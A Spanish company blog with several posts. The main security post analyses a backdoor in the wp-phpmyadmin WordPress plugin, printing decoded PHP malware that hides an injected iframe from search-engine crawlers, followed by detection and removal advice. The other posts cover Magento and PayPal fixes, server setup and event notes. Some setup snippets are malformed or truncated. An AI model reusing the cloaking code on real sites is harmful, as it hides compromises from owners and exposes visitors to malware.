onestic » Blog

Puerta trasera en el plugin de wp-phpmyadmin

admin — Mon, 22 Aug 2011 10:22:23 +0000

En los últimos meses hemos sido testigos de un ataque similar sobre algunos blogs a los que tenemos acceso. WordPress hackeado, con un iframe al comienzo de las páginas y que los buscadores no detectaban como página peligrosa. Sólo algunos antivirus de los usuarios se daban cuenta del ataque. Y el culpable (o donde residía la backdoor) era el plugin de wp-phpmyadmin.

El plugin de wp-phpmyadmin tiene una utilidad importante cuando no tienes acceso de otro modo a la base de datos de tu instalación de WordPress. Pero el precio que se puede pagar por usarlo, después de haber comprobado la vulnerabilidad que trae consigo, es bastante alto.

El plugin no se actualiza desde el 2007 (con wp 1.5), no se puede encontrar en el repositorio oficial de plugins de WordPress (http://wordpress.org/extend/plugins/), y lo más importante: se había conseguido introducir un fichero dentre el resto de ficheros del plugin que abría una puerta trasera a nuestro sistema.

Pero vamos por partes y a explicar cómo funciona este hack de WordPress con detalle:

El ataque consistía en introducir en los ficheros index.php una línea justo detrás del primer



Este código codificado, daba el siguiente fragmento de php tras decodificarlo, fragmento que acababa pintando un iframe antes de la etiqueta ? en los blog al pasarlo por la función eval():



error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
 array("216.239.32.0","216.239.63.255"),
 array("64.68.80.0"  ,"64.68.87.255"  ),
 array("66.102.0.0",  "66.102.15.255"),
 array("64.233.160.0","64.233.191.255"),
 array("66.249.64.0", "66.249.95.255"),
 array("72.14.192.0", "72.14.255.255"),
 array("209.85.128.0","209.85.255.255"),
 array("198.108.100.192","198.108.100.207"),
 array("173.194.0.0","173.194.255.255"),
 array("216.33.229.144","216.33.229.151"),
 array("216.33.229.160","216.33.229.167"),
 array("209.185.108.128","209.185.108.255"),
 array("216.109.75.80","216.109.75.95"),
 array("64.68.88.0","64.68.95.255"),
 array("64.68.64.64","64.68.64.127"),
 array("64.41.221.192","64.41.221.207"),
 array("74.125.0.0","74.125.255.255"),
 array("65.52.0.0","65.55.255.255"),
 array("74.6.0.0","74.6.255.255"),
 array("67.195.0.0","67.195.255.255"),
 array("72.30.0.0","72.30.255.255"),
 array("38.0.0.0","38.255.255.255")
 );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
 $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
 if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
 if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '';
}


Este iframe se intentaba ocultar a los robots de los buscadores y de rastreadores importantes para evitar que saltasen las alarmas de estos, y pusiesen en aviso al dueño del blog mediante alarmas al correo electrónico, bloqueos de su página desde la página de resultados de búsqueda, etc. Así podía permanecer el mayor tiempo posible estando oculto.



El contenido del iframe cargaba una direccion de un servidor (todos los distintos dominios que hemos podido comprobar estaban en Rumanía), donde se podía pintar cualquier cosa, seguramente troyanos javascript que comprometiesen la seguridad del usuario que visitase la web.





Cómo saber si tengo esta puerta trasera en mi sistema, y como solucionarlo (detección, solución y prevención):



- Comprobar si tenemos el plugin de wp-phpmyadmin, y buscar el fichero phpmyadmin/upgrade.php dentro del mismo. Renombrar la extensión o eliminar este fichero, sobre todo si tiene dentro unas instrucciones parecida a estas:






- Buscar en el resto de ficheros de wp-content la cadena ‘eval(stripslashes‘ (por ejemplo), y comprobar en los resultados si alguno se parece a la línea anterior.



- Mantener una política estricta de permisos sobre los ficheros de la instalación de WordPress. Si los ficheros index.php hubiesen estado correctamente configurados en cuanto a permisos, tal y como aconsejan en http://codex.wordpress.org/Hardening_WordPress la infección se hubiese podido evitar.



- Por supuesto, mantener nuestros plugins actualizados, junto con la última versión de WordPress siempre instalada. Y si alguno de los plugins deja de tener soporte o no se continúa su desarrollo, mejor optar por descartarlo y comenzar a buscar un sustituto del mismo.



Más info:



http://blog.sucuri.net/2011/06/wp-phpmyadmin-wordpress-plugin-delete-it-now.html



http://www.wpsecuritylock.com/wp-phpmyadmin-plugin-hacked-backdoor-vulnerability/



Especial cuidado también con los plugins wptouch, addthis y w3-total-cache:


http://wpmu.org/wordpress-security-exploit-found-upgrade-wptouch-addthis-and-w3-total-cache/

Magento, PayPal, IPN, las contrabarras (backslashes) y respuesta INVALID

Manel R. Doménech — Thu, 07 Apr 2011 16:02:45 +0000

Existe un pequeño problema en Magento con la validación de la respuesta IPN de PayPal. Ocurre incluso con el código de ejemplo para PHP4 del propio PayPal. Más que un problema se trata de una condición de error no contemplada. Esta condición ocurre cuando en algún campo del formulario de pago aparece el carcater contrabarra o backslash (\) y la opción de PHP magic_quotes_gpc está desactivada. Esta opción está marcada como obsoleta desde PHP 5.3 y suele encontrarse desactivada en la mayoría de las distribuciones actuales.

El problema está en utilizar la función stripslashes sobre el valor de los campos del formulario de pago que PayPal devuelve mediante el método POST. Si magic_quotes_gpc no está activada y se aplica stripslashes sobre los valores cualquier contrabarra desaparecerá o, más bien, se convertirá en un escapado del siguiente caracter. Y como al hacer el post back para verificar el pago PayPal espera recibir exactamente los mismos valores que ha enviado previamente, se recibirá un INVALID por resupuesta.

No es un problema grave, pero algunos usuarios de habla hispana abrevian calle como C\ (aunque la norma es hacerlo al revés, C/), y en estos casos el pago se realizará pero fallará su validación.

¿Cómo corregir esto? Bien NO haciendo el stripslashes o bien haciendo previamente un addslashes si magic_quotes_gpc está desactivado.

Para el código de ejemplo de PayPal:

Original:

...
foreach ($_POST as $key => $value) {
 $value = urlencode(stripslashes($value));
 $req .= "&$key=$value";
}
...

Solución 1:

...
foreach ($_POST as $key => $value) {
 $value = get_magic_quotes_gpc()?stripslashes($value):$value;
 $value = urlencode($value);
 $req .= "&$key=$value";
}
...

Solución 2a:

...
foreach ($_POST as $key => $value) {
 $value = get_magic_quotes_gpc()?$value:addslashes($value);
 $value = urlencode(stripslashes($value));
 $req .= "&$key=$value";
}
...

Solución 2b:

...
foreach ($_POST as $key => $value) $_POST[$key] = get_magic_quotes_gpc()?$value:addslashes($value);

foreach ($_POST as $key => $value) {
 $value = urlencode(stripslashes($value));
 $req .= "&$key=$value";
}
...

Para Magento hay que hacer algo análogo en el código de verificación. En la versión 1.5 puede encontrarse en el fichero

app/code/local/Onestic/PaypalIpnFixSlash/Model/Ipn.php

, en el método _postBack. en versiones anteriores este código está en

app/code/core/Mage/Paypal/Model/Standard.php

, en el método ipnPostSubmit.

Si no se desea tocar el código fuente de Magento, para la versión 1.5 se incluye este pequeño módulo Onestic_PaypalIpnFixSlash.

Tienda de Conserva Selección en Magento

Sergio Baixauli — Fri, 11 Feb 2011 08:44:41 +0000

Una vez más nos demoramos en la publicación de nuestros trabajos. Como asignatura pendiente para este 2011 queda la actualización de la web tanto de su estructura como de su contenido

Dicho esto nos gustaría presentaros uno de nuestros últimos trabajos desarrollados en Magento. Se trata de una tienda de Conservas de alta gama cuya principal característica es como no podía ser de otra forma, la calidad de sus productos.

Aprovecho esta entrada para responder a todos aquellos que nos preguntan sobre la importancia del diseño en las tiendas. Para nosotros es algo muy importante, es algo que nos gusta cuidar, pero más allá de una buena impletanción y de una interfaz de compra intuitiva sin duda alguna el éxito de una tienda radica en dos pilares fundamentales: el producto y la atención al cliente. Ya está, si no lo digo reviento. No olvidemos que una tienda online exige el mismo esfuerzo que cualquier otro negocio.

Retomando el tema de la nueva tienda hecha en Magento cabe destacar la integración del archi conocido módulo de compra en un paso,onestepcheckout (el día menos pensado desarrollaremos nuestra versión de este módulo…), generación de una página automática para las marcas con las que se trabaja, inserción automática de videos en las fichas de producto (funcionalidad que esperamos un día de estos esté integrada en Magento), Slide en jQuery para la portada, utilización del autocompletado que ya viene de serie con las nuevas versiones de Magento, integración del Blog realizado en WordPress con Magento (recordemos que existen varias técnicas, nosotros personalmente preferimos leer el feed y empotrarlo en el footer “a mano”).

Por lo demás como siempre un diseño y una estética muy cuidadas. Esperamos que os gueste! Y como siempre cualquier comentario será bien recibido!

Mejorar rendimiento en Magento, acelerando sesiones y cache

David Bolufer — Mon, 03 Jan 2011 18:21:22 +0000

Pequeño artículo donde explicamos una pequeña mejora en el rendimiento de Magento, consiste en guardar tanto la cache y las sesiones en un disco en memoría RAM usando el formato de ficheros TMPFS. Esto permite reducir el número de accesos a disco por parte de Magento. Lo primero sería configurar Magento para que guarde las sesiones utilizando archivos. Para ello editamos el archivo app/etc/local.xml.

A pesar de que en muchos tutoriales de rendimiento en Magento recomiendan guardar las sesiones en base de datos, no tiene sentido tener que cargar el servidor con INSERTS y UPDATES cuando se pueden manejar perfectamente usando PHP. Y a esta conclusión hemos llegado tras testear ambas configuraciones en nuestras tiendas y ver como, en aquellas tiendas que tienen algo de tráfico, las queries que gestionan las sesiones siempre están entre el top ten de queries lentas.

Vamos a destinar, por ejemplo, 256MB al sistema de caché de ficheros y 48MB para las sesiones. Si suponemos que nuestra tienda está en /var/www/tienda/, tendremos que montar las unidades en /var/www/tienda/var/cache/ y en /var/www/tienda/var/session/ para ello lo mejor es directamente editar el archivo /etc/fstab y añadir las siguientes líneas. Fstab es el archivo dónde se indica donde y cómo montar las particiones en el arranque del sistema.

tmpfs on /var/www/tienda/var/cache type tmpfs (rw,size=256,mode=0777)
tmpfs on /var/www/tienda/var/session type tmpfs (rw,size=48,mode=0777)

Ahora basta con recargar las particiones montadas usando

sudo mount -a

Instalar MaxMind GeoIP en CentOS

David Bolufer — Mon, 03 Jan 2011 11:59:54 +0000

Vamos a redactar un pequeño manual de como instalar el geolocalizador de IP de MaxMind, hay varias forma de tener acceso desde PHP a estos datos, nosotros vamos a realizar la instalación con mayor rendimiento que es como módulo de Apache:

yum list GeoIP*

Deberías ver algo así:

Finished
Available Packages
GeoIP.x86_64                1.4.7-0.1.20090931cvs.el5                  epel
GeoIP-data.x86_64         20090201-1.el5.centos                       extras
GeoIP-devel.x86_64        1.4.7-0.1.20090931cvs.el5                  epel

Procedemos a instalar todos los paquete, de ellos, GeoIP-data es el archivo que geolocaliza direcciones IP.

yum install GeoIP*
...
...
...
Running rpm_check_debug
Running Transaction Test
Finished Transaction Test
Transaction Test Succeeded
Running Transaction
 Installing     : GeoIP                                                                           1/3
 Installing     : GeoIP-devel                                                                     2/3
 Installing     : GeoIP-data                                                                      3/3

Installed:
 GeoIP.x86_64 0:1.4.7-0.1.20090931cvs.el5             GeoIP-data.x86_64 0:20090201-1.el5.centos
 GeoIP-devel.x86_64 0:1.4.7-0.1.20090931cvs.el5

Una vez instalados los módulos, procedemos a instalar el módulo para Apache 2.X, para ello necesitaremos tener instalado el comando apxs, parte del paquete httpd-devel, si no lo tenemos instalado basta con instalarlo desde yum.

cd /tmp
wget http://geolite.maxmind.com/download/geoip/api/mod_geoip2/mod_geoip2_1.2.5.tar.gz
tar -xvzf mod_geoip2_1.2.5.tar.gz
apxs -i -a -L/usr/lib -I/usr/include -lGeoIP -c mod_geoip.c

El último comando nos compila el módulo para nuestra versión de Apache, comprobar donde lo ha copiado pues nos hará falta en el siguiente paso para activar el módulo en Apache, en nuestro caso lo deposita en /usr/lib64/httpd/modules/mod_geoip.so. Editamos la configuración de Apache para añadir el módulo mod_geoip y activar la geolocalización.

LoadModule geoip_module /usr/lib64/httpd/modules/mod_geoip.so
...
...

  GeoIPEnable On
#Ruta hacia la base de datos con las IP's geolocalizadas
  GeoIPDBFile /var/lib/GeoIP/GeoIP.dat

Listo, tenemos instalado el soporte de GEO IP, este es un ejemplo para poder obtener en PHP.


GEOIP_COUNTRY_CODE: $country_code 

GEOIP_COUNTRY_CODE3: $country_code3 

GEOIP_COUNTRY_NAME: $country_name 

GEOIP_CITY_NAME: $geoip_city_name 

GEOIP_CITY_POSTAL_CODE: $geoip_city_postal_code 

GEOIP_CITY_LATITUDE: $geoip_city_latitude 

GEOIP_CITY_LONG_LATITUDE: $geoip_city_long_latitude 

GEOIP_CITY_DMA_CODE: $geoip_city_dma_code 

GEOIP_CITY_POSTAL_CODE: $geoip_city_postal_code 

GEOIP_CITY_AREA_CODE: $geoip_city_area_code 

";

Resumen de la Wordcamp Spain 2010

Sergio Nieto — Mon, 13 Dec 2010 10:19:00 +0000

La verdad es que como primera conclusión podemos decir que para nosotros, en la Wordcamp Spain 2010 se ha conseguido aumentar el nivel general del evento respecto al año pasado. Gracias a que hemos podido disfrutar de más gente de Automattic, como José Fontainhas que es ya un clásico, Karim Osman, Isaac Keyet (cofundador de IntenseDebate y ahora en plantilla), y también de la visita de Jeffrey Pearce como representante de Woothemes.com.

Las ponencias fueron bastante interesantes para todo tipo de perfiles. Bien es cierto que para los usuarios de WordPress algunas fueron demasiado técnicas, y que para los desarrolladores avanzados otras charlas profundizaron poco o carecían de interés. Pero a pesar de que cualquier ponencia tiene cierto grado de autopromoción, ninguna fue un publireportaje.

En la primera, Fernando Tellado nos siguió descubriendo plugins y usos de WordPress curiosos. Fernando siempre está descubriendo a la comunidad hispana de WordPress utilidades y plugins que mucha gente no encontraría porque ni siquiera se plantea buscarlos. Pero él está atento, y desde ayudawordpress.com siempre tiene algo interesante que enseñar. Podéis encontrar la ponencia de Fernando Tellado aquí.

La segunda fue para José Fontainhas, que expuso lo nuevo que viene con WordPress 3.1. Rápida y concisa. Según nos comentó lo mejor para conocer las novedades de WP3.1 es visitar la página oficial.

Rafael Poveda, de Mecus, nos explicó los entresijos de la creación rápida de temas con la nueva versión de WordPress 3.x. Temas elásticos, frameworks themes y temas hijos. Sobre todo, la idea de no reinventar la rueda creando temas desde cero sin pensar en que podemos aprovechar soluciones existentes mediante el uso de temas hijos, o temas específicos hipercustomizables. ¡Sólo falta que cuelguen la presentación! Puedes encontrar su presentación aquí.

Después fue el turno para el SeñorMuñoz, Fernando Muñoz, consultor SEO de profesión. Amplió la que nos ofreció el año pasado con unas nociones de SEO básicas pero imprescindibles a la hora de implementar temas de WordPress. Y para rematar nos mostró un amplio abanico de plugins para potenciar el aspecto SEO de un WordPress. Su presentación y su resumen la podéis encontrar en su web.

Tras la comida tuvimos el gusto de escuchar a Luis Rull, de Mecus, hablando de los distintos usos que se le puede dar a WordPress más allá de la creación de blogs. Y qué sorpresa la nuestra cuando presentó el proyecto de Chicisimo.com que con tanta ilusión estamos llevando hacia delante junto con sus creadores, Gabriel Aldamiz y su mujer María Arenaza. No nos cansaremos de agradecer a Luis que pusiese a chicisimo.com como ejemplo de uso de extremo de WordPress para crear una comunidad alrededor de un nexo común para sus usuarios, como es la moda. Además nos enseño otros sites que usan WordPress, aunque no lo parezca. Su presentación, en su blog personal.

Isaac Keyet, cofundador de IntenseDebate y ahora Coordinador del equipo de trabajo de desarrollos para dispositivos móviles de Automattic, nos introdujo a los temas específicos para este tipo de dispositivos y las herramientas principales que tenemos a nuestra disposición para usar WordPress en ellos.

Luego Karim Osman, también de Automattic, nos dio algunas pinceladas de los entresijos de una gran empresa como Automattic, de su historia y de hacia donde navegan en la actualidad. Siempre interesante que alguien tan simpático como Karim venga y te cuente como funciona una empresa que se ha hecho tan grande e importante en tan poco tiempo. Para tomar nota. Su presentación la podéis encontrar en su web.

Y por fin Fernando Serer, con su tan aplaudida ponencia (sobre todo en Twitter) sobre WordPress y el comercio electrónico. Temas y plugins para vender con WordPress. Que está claro que no es la misión de la plataforma en convertirse en un framework de tiendas online, pero para desarrollos rápidos, aprovechando quizás un site con Worpdress con cantidad de visitas, para crear tiendas con multitud de landing pages, es una cuestión a tener en cuenta. Y más después de tener en las manos el profundo análisis que expuso Fernando Serer y que realizaron en Blogestudio. Muy muy interesante. Superrecomendable ver la presentación en slideshare.

Jeffrey Pearce nos mostró su gran plugin WooThumbBlog, que forma parte de muchos temas que tienen a la venta en Woothemes. Jeffrey es un programador excepcional, y un tío muy simpático. Gracias a él nos vinimos con una camiseta de Woothemes, con un posible acuerdo para colaborar con ellos creando nuevos temas, y con un descuento del 30% en su plataforma Su presentación, en su web.

Y por último Rocío Valdivia nos enseñó como crear plugins multilenguaje desde cero y de una forma muy sencilla. Seguro que mucha gente perdió el miedo a crear su propio plugins, y alguno que incluía nueva funcionalidad en el tema ahora usará sus propios plugins a partir de ahora. Faltó tiempo para hacer una demostración en vivo, pero fue una ponencia muy interesante que podéis encontrar aquí.

Para finalizar, queremos darle nuestro agradecimiento a la gente de Packet Loss (Raúl Illana, Ismael Charif, Ricard Torres, etc etc) por hacer posible la Wordcamp en España y por el éxito de organización de este año. Y por supuesto a Cavalleto (su flickr) por ser testigo con su cámara y por permitirnos usar las fotos del evento.

Tienda de Zapatillas Satorisan en Magento

Sergio Baixauli — Fri, 15 Oct 2010 09:56:48 +0000

Nuevo desarrollo de una tienda en Magento. En este caso se trata de una tienda de Zapatillas llamada Satorisan. Poco a poco nos vamos posicionando en el mercado como empresa especialista en comercio electrónico y desarrollo de tiendas ecommerce.

Para esta tienda se han realizado las siguientes mejoras o extensiones desarrolladas a medida de las necesidades del cliente:

Carro de compra personalizado. Se ha modificado el clásico paso en horizontal para hacerlos verticales. Para ello se ha modificado todo el onestep y los javascript de varien para saltar de paso en paso. Por otro lado se han modificado los datos de registro personalizando los campos y su disposición.
Facturas personalizadas. Personalización de las facturadas generadas, envío de pdf tanto en las facturas rectificativas como en las facturas de pedido.
Creación de pasos intermedios de un pedido. Para su correcto seguimiento se han creado nuevos estados asociados a eventos y acciones. En realidad hemos dejado bastante poco del funcionamiento original.
Multiidioma en magento para la tienda. Soporte para dos idiomas, inglés y castellano.
Nuevos productos. Módulo en portada para nuevos productos integrado con un carrusel en jQuery.
Zoom para productos. Para el detalle de los productos se ha utilizado un zoom hecho en flash que permite ver las imágenes del producto a 4000×4000 (más que suficiente no?)
Carro de compra jQuery. En la cabecera de la tienda podéis ver el efecto al añadir y mostrar los productos.
Integración de Magento con DHL España. Hemos realizado un módulo para integrar la tienda con DHL y AZA Logistics. Con esto conseguimos sincronizar los estados de los pedidos en tiempo real, notificar desde Magento con los tracking numbers, generar las facturas cuando los pedidos son entregados, pasarlos a un estado completado y notificar a los clientes ante cualquier imprevisto. La verdad es que este ha sido un módulo muy costoso pero finalmente el resultado ha sido excelente.
Integración de Magento con SEUR. Para una nueva fase vamos a realizar un desarrollo para Magento y SEUR, con esto completaremos los anteriores desarrollos hechos para MRW y Magento.
Integración de módulo de 4b para el Banco popular con Magento. Desarrollo y ampliación de nuevas funcionalidades específicas para el pago a través de TPV.
Integración de Paypal Standar con Magento. Desde los últimos cambios hechos en la versión 1.4.1.1 todo han sido problemas. Finalmente hemos podido controlar los estados y acciones automáticas que realiza Paypal a través de su IPN. Todo un mundo creerme…
Cron en Magento. Creación de disparadores y acciones programadas para la ejecución y sincronización de stocks, estados de pedidos y envíos automáticos con los números de seguimiento.
HelpDesk para Magento. Soporte para tickets de ayuda y control de incidencias. Control a través de tickets de los correos procesados en la tienda así como sus estados.
RMA para Magento. La verdad es que en este sentido nos decidimos por adquirir uno ya desarrollado y la verdad es que el resultado no podía haber sido peor. Muy malas experiencias con el proveedor, un montón de fallos y una funcionalidad mal rematada. Así que posiblemente acabemos desarrollando nosotros un módulo de RMA (gestión de devoluciones).

La lista de cambios además de todas estas es interminable, así que mejor os dejamos descubrirlas. El resultado es una tienda en Magento a gusto del consumidor que esperamos funcione a las mil maravillas

Esperamos que os guste Satorisan!

Quelovendan.com – Nueva tienda E-commerce desarrollada en Magento

Sergio Baixauli — Wed, 02 Jun 2010 11:23:42 +0000

Hoy por fin hemos publicado nuestro último trabajo, quelovendan.com. La tienda oficial de nopuedocreer.com. Lo nuestro nos ha costado. Una vez más tenemos que dar la gracias a @Danitroy (nopuedocreer.com) y @jlhortelano (tecnorantes.com).

Esta nueva tienda desarrollada con Magento lleva muchas mejoras y alguna que otra extensión a medida. Integración con la pasarela de pago de La Caixa para Magento, LiveChat para atención personalizada, notificaciones, módulo de SEO para Magento, canonical urls, optimización y performance específicos en el Core de Magento para esta tienda, la integración con el sistema de envío de Magento para MRW, etc.

Como veréis hemos tenido en cuenta el publico objetivo, y por tanto, la estética. Los colores y la navegación están hechos a medida. ¡Esperamos que os guste y que compréis mucho!

Onestic en el E-commerce OpenDays 2010

Sergio Baixauli — Tue, 01 Jun 2010 13:45:04 +0000

Durante los días 8 y 9 de Junio se celebra en Madrid uno de los mayores eventos de comercio electrónico en España, el Expo-ecommerce.com.

Este año en Onestic vamos a montar un stand en la Feria para todos aquellos que queráis pasar a conocernos (stand 60). 5500 metros cuadrados de espacio ferial, 70 expositores, más de 4000 visitantes y 80 conferencias. También participaremos en una Mesa Redonda el día 9 de Junio cuya temática es “El software libre, una vía fácil y eficaz para tener tu negocio en Internet.” en la sala Amsterdam a las 10:00. Si alguno se quiere pasar ya sabéis…

El objetivo principal de esta mesa redonda es mostrar de manera clara las ventajas de las soluciones Open Source tanto a nivel económico como técnico. Intentaremos a través de nuestras experiencias y casos de éxito comentar lo que debemos tener en cuenta a la hora de montar un solución E-commerce.

Podéis consultar la lista de expositores aquí.

Instalar Magento 1.4 desde una consola SSH

Sergio Baixauli — Fri, 23 Apr 2010 09:46:42 +0000

Hola de nuevo a todos, hacía tiempo que no escribía nada, estamos a punto de lanzar dos nuevas tiendas en Magento y vamos muy liados. En cuanto estén listas las pondremos en la sección de Tiendas en Magento.

Las versiones de Magento han cambiado y la tarea de instalar una nueva tienda es algo que a las empresas que desarrollan/mos en Magento hacemos muy a menudo, os voy a poner los pasos para hacer una instalación base desde cero. Para anteriores versiones podéis ver este artículo, es prácticamente igual…

Lo primero de todo, acceso a la consola claro

Descargamos el paquete con la última versión:

wget http://www.magentocommerce.com/downloads/assets/1.4.0.1/magento-1.4.0.1.tar.gz

Descomprimimos el paquete:
```
tar -zxvf magento-1.4.0.1.tar.gz
```
Movemos el contenido de la carpeta Magento a nuestro directorio raiz (public_html. www, o el que sea):
```
mv magento/* magento/.htaccess .
```
Cambiamos permisos a la carpeta media (donde estarán las img de nuestro catálogo):
```
chmod -R o+w media
```
Configuramos la instalación de Magento y buscamos las últimas actualizaciones:
```
./pear mage-setup .
```
[code]./pear install magento-core/Mage_All_Latest-stable[/code]
Este último paso debería traernos e instalar bastantes paquetes, esperar a que termine.
Cambiamos permisos a la carpeta var (aquí es donde va la cache, logs, sesiones, etc):
```
chmod o+w var var/.htaccess app/etc
```
Borramos la cache y “basura” que ha quedado en tras la instalación:
```
rm -rf downloader/pearlib/cache/* downloader/pearlib/download/*
```
Borramos la carpeta Magento (debería estar vacia) y el paquete original que nos hemos bajado:
```
rm -rf magento/ magento-1.4.0.1.tar.gz
```
Ahora pasamos a la creación de la Base de datos.
Desde la consola entramos a MySQL:
```
$ mysql -u root
```
Ejecutamos:
```
mysql> create database nombre_de_la_db;
```

Creamos el usuario:

grant usage on *.* to nombre_usuario@localhost identified by 'aqui_la_contraseña;

Asignamos el usuario a la base de datos:

grant all privileges on nombre_de_la_db.* to nombre_usuario@localhost ;

Ya hemos terminado, ahora podemos empezar la instalación de nuestra nueva tienda en Magento

Y nada más…